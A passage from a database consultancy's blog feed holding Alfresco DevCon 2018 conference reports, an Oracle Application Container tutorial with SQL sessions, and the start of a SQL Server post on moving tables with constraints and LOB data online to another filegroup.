  • Replicate the Shards to increased response time and it also provides High Availability so… No reasons not to!
  • Backup the Shards using the provided Web Service so Alfresco can do it for you for one or several Shards
  • Use DB_ID_RANGE if you want to be able to add Shards without having to perform a full reindex, this is the only way
  • If you need another method than DB_ID_RANGE, then plan carefully the number of Shards to be created. You might want to overshard to take into account the future growth
  • Keep in mind that each Shard will pull the changes from Alfresco every 15s and it all goes to the DB… It might create some load there and therefore be sure that your DB can handle that
  • As far as I know, at the moment, the Sharding does not support Solr in SSL. Solr should anyway be protected from external accesses because it is only used by Alfresco internally so this is an ugly point so far but it’s not too bad. Sharding is pretty new so it will probably support the SSL at some point in the future
  • Tune properly Solr and don’t forget the Application Server request header size
    • Solr4 => Tomcat => maxHttpHeaderSize=…
    • Solr6 => Jetty => solr.jetty.request.header.size=…

 

The day-2 started with a session from John Newton which presented the impact of emerging technologies on content. As usual, John’s presentation had a funny theme incorporated in the slides and this time it was Star Wars.

DevCon2018_StarWars

 

After that, I attended the Hack-a-thon showcase, presented/introduced by Axel Faust. In the Alfresco world, Hack-a-thons are:

  • There since 2012
  • Open-minded and all about collaboration. Therefore, the output of any project is open source and available for the community. It’s not about money!
  • Always the source of great add-ons and ideas
  • 2 times per year
    • During conferences (day-0)
    • Virtual Hack-a-thon (36h ‘follow-the-sun’ principle)

A few of the 16 teams that participated in the Hack-a-thon presented the result of their Hack-a-thon day and there were really interesting results for ACS, ACS on AWS, APS, aso…

Except that, I also attended all lightning talks on this day-2 as well as presentations on PostgreSQL and Solr HA/Backup solutions and best practices. The presentations about PostgreSQL and Solr were interesting especially for newcomers because it really explained what should be done to have a highly available and resilient Alfresco environment.

 

There were too many lightning talk to mention them all but as always, there were some quite interesting and there I just need to mention the talk about the ContentCraft plugin (from Roy Wetherall). There cannot be an Alfresco event (be it a Virtual Hack-a-thon, BeeCon or DevCon now) without an Alfresco integration into Minecraft. Every year, Roy keeps adding new stuff into his plugin… I remember years ago, Roy was already able to create a building in Minecraft where the height represented the number of folders stored in Alfresco and the depth was the number of documents inside, if my memory is correct (this changed now, it represents the number of sub-folders). This year, Roy presented the new version and it’s even more incredible! Now if you are in front of one of the building’s door, you can see the name and creator of the folder in a ‘Minecraft sign’. Then you can walk in the building and there is a corridor. On both sides, there are rooms which represent the sub-folders. Again, there are ‘Minecraft signs’ there with the name and creator of the sub-folders. Until then, it’s just the same thing again so that’s cool but it will get even better!

If you walk in a room, you will see ‘Minecraft bookshelves’ and ‘Minecraft chests’. Bookshelves are just there for the decoration but if you open the chests, then you will see, represented by ‘Minecraft books’, all your Alfresco documents stored on this sub-folder! Then if you open a book, you will see the content of this Alfresco document! And even crazier, if you update the content of the book on Minecraft and save it, the document stored in Alfresco will reflect this change! This is way too funny :D.

It’s all done using CMIS so there is nothing magical… Yet it really makes you wonder if there are any limits to what Alfresco can do ;).

 

If I dare to say: long live Alfresco! And see you around again for the next DevCon.

 

 

Cet article Alfresco DevCon 2018 – Day 2 – Big files, Solr Sharding and Minecraft, again! est apparu en premier sur Blog dbi services.

Alfresco DevCon 2018 – Day 1 – ADF, ADF and… ADF!

Wed, 2018-01-17 13:30

Here we are, the Alfresco DevCon 2018 day-1 is over (well except for the social party)! It’s been already 2 years I attended my last Alfresco event (BeeCon 2016, first of its name (organized by the Order of the Bee)) because I wasn’t able to attend the second BeeCon (2017) since it happened on the exact dates of our internal dbi xChange event. Yesterday was the DevCon 2018 day-0 with the Hackathon, the full day training and the ACSCE/APSCE Certification preparation but today was really the first day of sessions.

DevCon2018_Logo

 

The day-1 started, as usual, with a Keynote from Thomas DeMeo which presented interesting information regarding the global direction of Alfresco products, the Roadmap (of course) for the coming year as well as some use cases where Alfresco was successfully used in very interesting projects including also AWS.

DevCon2018_Roadmap

 

The second part of the keynote has been presented by Brian Remmington which explained the future of the Alfresco Digital Platform. In the next coming months/years, Alfresco will include/refactor/work on the following points for its Digital Platform:

  • Improve SSO solutions. Kerberos is already working very well with Alfresco but they intend to also add SAML2, OAuth, aso… This is a very good thing!
  • Merging the Identity management for the ACS and APS into one single unit
  • Adding an API Gateway in front of ACS and APS to always talk to the same component and targeting in the background both the ACS and APS. It will also allow Alfresco to change the backend APIs, if needed (to align them for example), without the API Gateway noticing it. This is a very good thing too from a developer perspective since you will be sure that your code will not break if Alfresco rename something for example!
  • Merging the search on the ACS and APS into one single search index
  • We already knew it but it was confirmed that Alfresco [will probably drop the default installer and instead] will provide docker/kubernetes means for you to deploy Alfresco easily and quickly using these new technologies
  • Finishing the merge/refactor of other ACS/APS services into common units for both products so that work done once isn’t duplicated. This will concern the Search (Insight?) Service, the Transformation Service, the Form Service and a new Function Service (basically code functions shared between ACS and APS!).

All this looks promising, like really.

 

Then starting at 10am, there were four streams running in parallel so there is something that you will find interesting, that’s for sure. I didn’t mention it but DevCon isn’t just a name… It means that the sessions are really technical, we are far from the (boring) Business presentations that you can find on all other competitors’ events… I did a full morning on ADF. Mario Romano and Ole Hejlskov were presenting ADF Basics and Beyond.

For those of you who don’t know yet, ADF (Alfresco Development Framework) is the last piece of the Digital Platform that Alfresco has been bringing recently. It is a very interesting new framework that allows you to create your own UI to use in front of the ACS/APS. There are at the moment more than 100 angular components that you can use, extend, compose and configure to build the UI that will match your use case. Alfresco Share still provide way more features than ADF but I must say that I’m pretty impressed by what you can achieve in ADF with very little: it looks like it is going in the right direction.

ADF 2.0 has been released recently (November 2017) and it is based on three main pillars: the latest version of Angular 5, a powerful JavaScript API (that talk in the background with the ACS/APS/AGS APIs) and the Yeoman generator+Angular CLI for fast deployments.

ADF provides 3 extensions points for you to customize a component:

  • html extension points => adding html to customize the look&feel or the behavior
  • event listeners => adding behaviors on events for example
  • config properties => each component has properties that will customize it

One of the goal of ADF is the ability to upgrade your application without any efforts. Angular components will be updated in the future but it was designed (and Alfresco effort is going) in a way that even if you use these components in your ADF application, then an upgrade of your application won’t hurt at all. If you want to lean more about ADF, then I suggest you the Alfresco Tech Talk Live that took place in December as well as the Alfresco Office Hours.

 

After this first introduction session to ADF, Eugenio Romano went deeper and showed how to play with ADF 2.0: installing it, deploying a first application and then customizing the main pieces like the theme, the document list, the actions, the search, aso… There were some really interesting examples and I’m really looking forward seeing the tutorials and documentations popping up on the Alfresco Website about these ADF 2.0 new features and components.

 

To conclude the morning, Denys Vuika presented a session about how to use and Extend the Alfresco Content App (ACA). The ACA is the new ADF 2.0 application provided by Alfresco. It is a demo/sample application whose purpose is to be lightweight so it is as fast as possible. You can then customize it as you want, play with the ADF so that this sample application match your needs. One of the demo Denys presented is how you can change the default previewer for certain type of files (.txt, .js, .xml for example). In ADF, that’s like 5 lines of code (of course you need to have another previewer of your own but that’s not ADF stuff) and then he had an awesome preview for .js files where there were syntax highlighting right inside the Alfresco preview as well as tooltips on names to give description of variables and functions apparently. This kind of small features but done so easily look quite promising.

 

I already wrote a lot on ADF today so I will stop my blog here but I did attend a lot of other very interesting sessions on the afternoon. I might talk about that tomorrow.

 

 

 

Cet article Alfresco DevCon 2018 – Day 1 – ADF, ADF and… ADF! est apparu en premier sur Blog dbi services.

Oracle Application Container: a Swiss Use case

Tue, 2018-01-16 17:11

Here we want to start a business in Switzerland in 3 different areas and make it easy to start a new market area as soon as required by that business. We are going to use the Application Container feature in order to:

  • Have a dedicated PDB for each marker with shared and local metadata and data
  • Roll out frequently data model and code to add features in a central manner with one command

We have first to create an master application container, you can have many master application containers within a CDB. We will also create a seed PDB from that master application container. Not mandatory, its role will be to keep a sync copy of the master and improves speed provisioning for new pluggable database creation within the master container.

SQL> create pluggable database B2C_WEB_CON as application container admin user pdbadmin identified by secret roles = (DBA) ;

Pluggable database B2C_WEB_CON created.

SQL> alter pluggable database B2C_WEB_CON open;

Pluggable database B2C_WEB_CON altered.

SQL> alter session set container = B2C_WEB_CON ;

Session altered.

SQL> create pluggable database as seed admin user pdbadmin identified by oracle roles=(DBA)  ;

Pluggable database AS created.

SQL> alter pluggable database B2C_WEB_CON$SEED open;

Pluggable database B2C_WEB_CON$SEED altered.

SQL> select PDB_ID, PDB_NAME, STATUS, IS_PROXY_PDB, APPLICATION_ROOT, APPLICATION_PDB, APPLICATION_SEED, APPLICATION_ROOT_CON_ID from dba_pdbs order by 1;
  PDB_ID PDB_NAME           STATUS   IS_PROXY_PDB   APPLICATION_ROOT   APPLICATION_PDB   APPLICATION_SEED     APPLICATION_ROOT_CON_ID
       4 B2C_WEB_CON        NORMAL   NO             YES                NO                NO
       5 B2C_WEB_CON$SEED   NORMAL   NO             NO                 YES               YES                                        4

 

I will now create an application from zero. An application is a set of command executed in the master application container and on which a version tag is applied. In other words, Oracle will record what happens in the master container and applied a version flag on those commands to replay them in future PDBs.

SQL> connect sys/oracle@//localhost:1521/B2C_WEB_CON as sysdba
Connected.

SQL> create user USR_B2C_WEB identified by secret quota unlimited on TBS_B2C_WEB ;

User USR_B2C_WEB created.

SQL> alter user USR_B2C_WEB default tablespace TBS_B2C_WEB ;

User USR_B2C_WEB altered.

SQL> grant create session, resource to USR_B2C_WEB ;

Grant succeeded.

SQL> alter session set current_schema = USR_B2C_WEB ;

Session altered.

SQL> create table customers ( customer_id number, name varchar2(50), address varchar2(50) ) ;

Table CUSTOMERS created.

SQL> create table orders ( order_id number, customer_id number, order_date date ) ;

Table ORDERS created.

SQL> create table order_details ( order_detail_id number, order_id number, product_id number, quantity number ) ;

Table ORDER_DETAILS created.

SQL> create table products ( product_id number, name varchar2(50) ) ;

Table PRODUCTS created.

SQL> alter pluggable database application B2C_WEB_APP end install '1.0';

Pluggable database APPLICATION altered.

SQL> select * from dba_applications;
APP_NAME                                 APP_ID APP_VERSION   APP_STATUS   APP_IMPLICIT   APP_CAPTURE_SERVICE   APP_CAPTURE_MODULE
APP$62EA42BE47360FA8E0537A38A8C0A0F3          2 1.0           NORMAL       Y              SYS$USERS             java@VM122 (TNS V1-V3)
B2C_WEB_APP                                   3 1.0           NORMAL       N              b2c_web_con           java@VM122 (TNS V1-V3)

 

We can now synchronize the application tables of our application B2C_WEB_APP from the MASTER to the SEED in order to increase the next pluggable database creations speed

SQL> connect sys/oracle@//localhost:1521/B2C_WEB_CON$SEED as sysdba

Session altered.

SQL> alter pluggable database application B2C_WEB_APP sync ;

 

Then, go to the master and create your pluggable database for each market with the latest B2C_WEB_APP application release which is currently 1.0

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> create pluggable database B2C_WEB_APP_VD admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_VD created.

SQL> create pluggable database B2C_WEB_APP_GE admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_GE created.

SQL> create pluggable database B2C_WEB_APP_ZH admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_ZH created.

 

We open and save state to make them opened at the next CDB restart

SQL> connect sys/oracle@//localhost:1521/B2C_WEB_CON as sysdba
Connected.

SQL> alter pluggable database all open ;

Pluggable database ALL altered.

SQL> alter pluggable database save state ;

Pluggable database SAVE altered.

 

Let’s generate some business activity on each pluggable database corresponding to different Swiss markets

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_VD
Connected.
SQL> insert into usr_b2c_web.products select rownum, 'product_VD_00'||rownum from dual connect by level <= 5 ;

5 rows inserted.

SQL> commit ;

Commit complete.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> insert into usr_b2c_web.products select rownum, 'product_GE_00'||rownum from dual connect by level <= 5 ;

5 rows inserted.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> insert into usr_b2c_web.products select rownum, 'product_ZH_00'||rownum from dual connect by level <= 5 ;

5 rows inserted.

SQL> commit;

Commit complete.

 

Now we can check from the master container if data are well located according to their market

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, p.*
  2  from containers ( PRODUCTS ) p ;
CON$NAME           PRODUCT_ID NAME               CON_ID
B2C_WEB_APP_ZH              1 product_ZH_001          7
B2C_WEB_APP_ZH              2 product_ZH_002          7
B2C_WEB_APP_ZH              3 product_ZH_003          7
B2C_WEB_APP_ZH              4 product_ZH_004          7
B2C_WEB_APP_ZH              5 product_ZH_005          7
B2C_WEB_APP_GE              1 product_GE_001          6
B2C_WEB_APP_GE              2 product_GE_002          6
B2C_WEB_APP_GE              3 product_GE_003          6
B2C_WEB_APP_GE              4 product_GE_004          6
B2C_WEB_APP_GE              5 product_GE_005          6
B2C_WEB_APP_VD              1 product_VD_001          3
B2C_WEB_APP_VD              2 product_VD_002          3
B2C_WEB_APP_VD              3 product_VD_003          3
B2C_WEB_APP_VD              4 product_VD_004          3
B2C_WEB_APP_VD              5 product_VD_005          3

 

We have different products for each of our markets. Now, we would like to Upgrade the data model and add some code (a procedure) to add a basic feature: add a customer

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> alter pluggable database application B2C_WEB_APP begin upgrade '1.0' to '1.1';

Pluggable database APPLICATION altered.

SQL> alter session set current_schema = USR_B2C_WEB ;

Session altered.

SQL> alter table customers drop ( address ) ;

Table CUSTOMERS altered.

SQL> alter table customers add ( email varchar2(35) ) ;

Table CUSTOMERS altered.

SQL> alter table products add ( price number (8, 2) ) ;

Table PRODUCTS altered.

SQL> create sequence customer_seq ;

Sequence CUSTOMER_SEQ created.

SQL> create procedure customer_add ( name in varchar2, email in varchar2 ) as
  2  begin
  3    insert into customers values ( customer_seq.nextval, name, email ) ;
  4    commit ;
  5  end;
  6  /

Procedure CUSTOMER_ADD compiled

SQL> alter pluggable database application B2C_WEB_APP end upgrade to '1.1';

Pluggable database APPLICATION altered.

 

Let push in production the release 1.1 one market after each other

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync ;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync ;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync ;

Pluggable database APPLICATION altered.

 

Some business activity happens and new customer are going to appears with the new feature we deployed at the release 1.1 of our B2C_WEB_APP application

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> exec customer_add ('Scotty Hertz', 'SCOTTY@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Scotty Hertz', 'SCOTTY@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Smith Watson', 'SMITH@YAHOO.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('John Curt', 'JOHN@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Dalton X', 'DALTON@AOL.COM') ;

PL/SQL procedure successfully completed.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> exec customer_add ('Scotty Hertz', 'SCOTTY@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Sandeep John', 'SANDEEP@YAHOO.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Smith Curt', 'SMITH@YAHOO.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Orlondo Watson', 'ORLONDO@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> exec customer_add ('Maria Smith', 'MARIA@GMAIL.COM') ;

PL/SQL procedure successfully completed.

SQL> exec customer_add ('Smith Scotty', 'SMITH@YAHOO.COM') ;

PL/SQL procedure successfully completed.

 

Now, have a look on the new customer data from the master master container

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, c.*
  2  from containers ( CUSTOMERS ) c ;
CON$NAME           CUSTOMER_ID NAME             EMAIL                 CON_ID
B2C_WEB_APP_VD               1 Scotty Hertz     SCOTTY@GMAIL.COM           3
B2C_WEB_APP_VD               2 Scotty Hertz     SCOTTY@GMAIL.COM           3
B2C_WEB_APP_VD               3 Smith Watson     SMITH@YAHOO.COM            3
B2C_WEB_APP_VD               4 John Curt        JOHN@GMAIL.COM             3
B2C_WEB_APP_VD               5 Dalton X         DALTON@AOL.COM             3
B2C_WEB_APP_GE               1 Scotty Hertz     SCOTTY@GMAIL.COM           6
B2C_WEB_APP_GE               2 Sandeep John     SANDEEP@YAHOO.COM          6
B2C_WEB_APP_GE               3 Smith Curt       SMITH@YAHOO.COM            6
B2C_WEB_APP_GE               4 Orlondo Watson   ORLONDO@GMAIL.COM          6
B2C_WEB_APP_ZH               1 Maria Smith      MARIA@GMAIL.COM            7
B2C_WEB_APP_ZH               2 Smith Scotty     SMITH@YAHOO.COM            7


11 rows selected.

 

As we don’t like the email format because it’s ugly in the web interface, we now are going to release a “data” patch on top of the release 1.1 in order to format customer’s emails in a proper manner

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> alter pluggable database application B2C_WEB_APP begin patch 1 minimum version '1.1' ;

Pluggable database APPLICATION altered.

SQL> update usr_b2c_web.customers set email = trim(lower(email)) ;

0 rows updated.

SQL> alter pluggable database application B2C_WEB_APP end patch 1 ;

Pluggable database APPLICATION altered.

SQL> select * from dba_app_patches;
APP_NAME        PATCH_NUMBER PATCH_MIN_VERSION   PATCH_STATUS   PATCH_COMMENT
B2C_WEB_APP                1 1.1                 INSTALLED

 

As we know have a patch ready to cleanup the email format we are ready to deploy it on each market

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

 

Let’s check if the data patch has been applied successfully and the email format is now OK for all markets

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, c.*
  2  from containers ( CUSTOMERS ) c ;
CON$NAME           CUSTOMER_ID NAME             EMAIL                 CON_ID
B2C_WEB_APP_VD               1 Scotty Hertz     scotty@gmail.com           3
B2C_WEB_APP_VD               2 Scotty Hertz     scotty@gmail.com           3
B2C_WEB_APP_VD               3 Smith Watson     smith@yahoo.com            3
B2C_WEB_APP_VD               4 John Curt        john@gmail.com             3
B2C_WEB_APP_VD               5 Dalton X         dalton@aol.com             3
B2C_WEB_APP_ZH               1 Maria Smith      maria@gmail.com            7
B2C_WEB_APP_ZH               2 Smith Scotty     smith@yahoo.com            7
B2C_WEB_APP_GE               1 Scotty Hertz     scotty@gmail.com           6
B2C_WEB_APP_GE               2 Sandeep John     sandeep@yahoo.com          6
B2C_WEB_APP_GE               3 Smith Curt       smith@yahoo.com            6
B2C_WEB_APP_GE               4 Orlondo Watson   orlondo@gmail.com          6


11 rows selected.

 

A new feature has now been claimed from the business. We need an upgrade of the application to add a parameters table that should contains USR_B2C_WEB application’s parameters which must be shared on all PDB applications. Also each market want be able to add its own parameters without impacting existing one or others markets.
We are going to use the attribute “SHARING” set to “EXTENDED DATA” for that table to make possible a mix of shared data in the master and PDB local data in the same table (deeper explanation and others sharing modes here).

SQL> connect pdbadmin/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> alter pluggable database application B2C_WEB_APP begin upgrade '1.1' to '1.2';

Pluggable database APPLICATION altered.

SQL> create table usr_b2c_web.settings sharing = extended data ( name varchar2(50), value varchar2(50) );

Table USR_B2C_WEB.SETTINGS created.

SQL> insert into usr_b2c_web.settings values ( 'compagny_name', 'wisdom IT' ) ;

1 row inserted.

SQL> insert into usr_b2c_web.settings values ( 'head_quarter_address', 'street village 34, 3819 Happiness, Switzerland' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

SQL> alter pluggable database application B2C_WEB_APP end upgrade to '1.2';

Pluggable database APPLICATION altered.

 

Upgrade 1.2 for all market and addition of a local parameter “market_name” for each market

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_VD
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> insert into usr_b2c_web.settings values ( 'market_name', 'VAUD' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_GE
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> insert into usr_b2c_web.settings values ( 'market_name', 'GENEVA' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

SQL> connect pdbadmin/oracle@//localhost:1521/B2C_WEB_APP_ZH
Connected.

SQL> alter pluggable database application B2C_WEB_APP sync;

Pluggable database APPLICATION altered.

SQL> insert into usr_b2c_web.settings values ( 'market_name', 'ZURICH' ) ;

1 row inserted.

SQL> commit ;

Commit complete.

 

Now we check if shared parameters are available for all markets and each one of them has a dedicated “market_name” value

SQL> connect usr_b2c_web/secret@//localhost:1521/B2C_WEB_CON
Connected.

SQL> select con$name, c.*
  2  from containers ( SETTINGS ) c ;

CON$NAME         NAME                   VALUE                                              CON_ID
B2C_WEB_CON      compagny_name          wisdom IT                                               4
B2C_WEB_CON      head_quarter_address   street village 34, 3819 Happiness, Switzerland          4
B2C_WEB_APP_GE   compagny_name          wisdom IT                                               6
B2C_WEB_APP_GE   head_quarter_address   street village 34, 3819 Happiness, Switzerland          6
B2C_WEB_APP_GE   market_name            GENEVA                                                  6
B2C_WEB_APP_VD   compagny_name          wisdom IT                                               3
B2C_WEB_APP_VD   head_quarter_address   street village 34, 3819 Happiness, Switzerland          3
B2C_WEB_APP_VD   market_name            VAUD                                                    3
B2C_WEB_APP_ZH   compagny_name          wisdom IT                                               7
B2C_WEB_APP_ZH   head_quarter_address   street village 34, 3819 Happiness, Switzerland          7
B2C_WEB_APP_ZH   market_name            ZURICH                                                  7

 

Looks all good.

Now the business need to extend the startup activity to a new market area of Switzerland. We are so going to add a new pluggable database for that marker. This market will benefit immediately of the latest application release.

SQL> alter session set container = B2C_WEB_CON ;

Session altered.

SQL> create pluggable database B2C_WEB_APP_ZG admin user pdbadmin identified by secret roles=(DBA) ;

Pluggable database B2C_WEB_APP_ZG created.

SQL> alter pluggable database B2C_WEB_APP_ZG open;

Pluggable database B2C_WEB_APP_ZG altered.

 

Let’s check with the parameter table if all data have been synchronized

SQL> select con$name, c.*
  2  from containers ( SETTINGS ) c ;
CON$NAME         NAME                   VALUE                                              CON_ID
B2C_WEB_APP_VD   compagny_name          wisdom IT                                               3
B2C_WEB_APP_VD   head_quarter_address   street village 34, 3819 Happiness, Switzerland          3
B2C_WEB_APP_VD   market_name            VAUD                                                    3
B2C_WEB_CON      compagny_name          wisdom IT                                               4
B2C_WEB_CON      head_quarter_address   street village 34, 3819 Happiness, Switzerland          4
B2C_WEB_APP_GE   compagny_name          wisdom IT                                               6
B2C_WEB_APP_GE   head_quarter_address   street village 34, 3819 Happiness, Switzerland          6
B2C_WEB_APP_GE   market_name            GENEVA                                                  6
B2C_WEB_APP_ZH   compagny_name          wisdom IT                                               7
B2C_WEB_APP_ZH   head_quarter_address   street village 34, 3819 Happiness, Switzerland          7
B2C_WEB_APP_ZH   market_name            ZURICH                                                  7
B2C_WEB_APP_ZG   compagny_name          wisdom IT                                               5
B2C_WEB_APP_ZG   head_quarter_address   street village 34, 3819 Happiness, Switzerland          5

 

I wish this post will help to understand how to implement Container Application in real life and please do not hesitate to contact us if you have any questions or require further information.

 

Cet article Oracle Application Container: a Swiss Use case est apparu en premier sur Blog dbi services.

Moving tables ONLINE on filegroup with constraints and LOB data

Mon, 2018-01-15 00:20

Let’s start this new week by going back to a discussion with one of my customers a couple of days ago about moving several tables into different filegroups. Let’s say that some of them contained LOB data. Let’s add to the game another customer requirement: moving all of them ONLINE to avoid impacting the data availability during the migration process. The concerned tables had schema constraints as primary key and foreign keys and non-clustered indexes as well. So a pretty common schema we may deal with daily at customer shops.

Firstly, let’s say that the first topic of the discussion didn’t focus on moving non-clustered indexes on a different filegroup (pretty well-known from my customer) but on how to manage moving constraints online without integrity issues. The main reason of that came from different pointers found by my customer on the internet where we have to first drop such constraints and then to recreate them (by using TO MOVE clause) and that’s whay he was not very confident to move such constraints without introducing integrity issues.

Let’s illustrate this scenario with the following demonstration. I will use a dbo.TransactionHistory2 table that I want to move ONLINE from the primary to the FG1 filegroup. There is a primary key constraint on the TransactionID column as well as foreign key on the ProductID column that refers to dbo.bigProduct table and the ProductID column.

EXEC sp_helpconstraint 'dbo.bigTransactionHistory2';

blog 125 - 1 - bigTransactionHistory2 PK FK

Here a picture of indexes existing on the dbo.bigTransactionHistory2 table:

EXEC sp_helpindex 'dbo.bigTransactionHistory2';

blog 125 - 2 - bigTransactionHistory2 indexes

Let’s say that the pk_big_TranactionHistory_TransactionID unique clustered index is tied to the primary key constraint.

Let’s start by using the first approach based on the WITH MOVE clause .

ALTER TABLE dbo.bigTransactionHistory2 DROP CONSTRAINT pk_bigTransactionHistory_TransactionID WITH (MOVE TO FG1, ONLINE = ON);

--> No constraint to avoid duplicates

ALTER TABLE dbo.bigTransactionHistory2 ADD CONSTRAINT pk_bigTransactionHistory_TransactionID PRIMARY KEY(TransactionDate, TransactionID)
WITH (ONLINE = ON);

By looking further at the script performed  we may quickly figure out that this approach may lead to introduce duplicate entries between the drop constraint step and the move table on the FG1 filegroup and  create constraint step.

We might address this issue by encapsulating the above command within a transaction. But obviously this method has cost: we have good chance to create a long blocking scenario – depending on the amount of data – and leading temporary to data unavailability. The second drawback concerns the performance. Indeed, we first drop the primary key constraint meaning we are dropping the underlying clustered index structure in the background. Going this way implies to rebuild also related non-clustered indexes to update the leaf level with row ids and to rebuild them again when re-adding the primary key constraint in the second step.

From my point of view there is a better way to go through if we want all the steps to be performed efficiently and ONLINE including the guarantee that constraints will continue to ensure checks during all the moving process.

Firstly, let’s move the primary key by using a one-step command. The same applies to the UNIQUE constraints. In fact, moving such constraint requires only to rebuild the corresponding index with the parameters DROP_EXISTING and ONLINE parameters to preserve the constraint functionality. In this case, my non-clustered indexes are not touched by the operation because we don’t have to update the leaf level as the previous method.

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionDate] ASC, [TransactionID] ASC )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON [FG1];

In addition, the good news is if we try to introduce a duplicate key while the index is rebuilding on the FG1 filegroup we will face the following error as expected:

Msg 2627, Level 14, State 1, Line 3
Violation of PRIMARY KEY constraint ‘pk_bigTransactionHistory_TransactionID’.
Cannot insert duplicate key in object ‘dbo.bigTransactionHistory2′. The duplicate key value is (Jan 1 2005 12:00AM, 1).

So now we may safely move the additional structures represented by the non-clustered index. We just have to execute the following command to move ONLINE the corresponding physical structure:

CREATE INDEX [idx_bigTransactionHistory2_ProductID]
ON dbo.bigTransactionHistory2 ( ProductID ) 
WITH (DROP_EXISTING = ON, ONLINE = ON)
ON [FG1]

 

Le’ts continue with the second scenario that consisted in moving a table ONLINE on a different filegroup with LOB data. Moving such data may be more complex as we may expect. The good news is SQL Server 2012 has introduced ONLINE operation capabilities and my customer run on SQL Server 2014.

For the demonstration let’s going back to the previous demo and let’s introduce a new [other infos] column with VARCHAR(MAX) data. Here the new definition of the dbo.bigTransactionHistory2 table:

CREATE TABLE [dbo].[bigTransactionHistory2](
	[TransactionID] [bigint] NOT NULL,
	[ProductID] [int] NOT NULL,
	[TransactionDate] [datetime] NOT NULL,
	[Quantity] [int] NULL,
	[ActualCost] [money] NULL,
	[other infos] [varchar](max) NULL,
 CONSTRAINT [pk_bigTransactionHistory_TransactionID] PRIMARY KEY CLUSTERED 
(
	[TransactionID] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY],
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]
GO

Let’s take a look at the table’s underlying structure:

SELECT 
	OBJECT_NAME(p.object_id) AS table_name,
	p.index_id,
	p.rows,
	au.type_desc AS alloc_unit_type,
	au.used_pages,
	fg.name AS fg_name
FROM 
	sys.partitions as p
JOIN 
	sys.allocation_units AS au on p.hobt_id = au.container_id
JOIN	
	sys.filegroups AS fg on fg.data_space_id = au.data_space_id
WHERE
	p.object_id = OBJECT_ID('bigTransactionHistory2')
ORDER BY
	table_name, index_id, alloc_unit_type

 

blog 125 - 3 - bigTransactionHistory2 with LOB

A new LOB_DATA allocation unit type is there and indicates the table contains LOB data for all the index structures. At this stage, we may think that going to the previous way to move online the unique clustered index is sufficient but it is not according the output below:

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionID] )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON [FG1];

blog 125 - 4 - bigTransactionHistory2 move LOB data

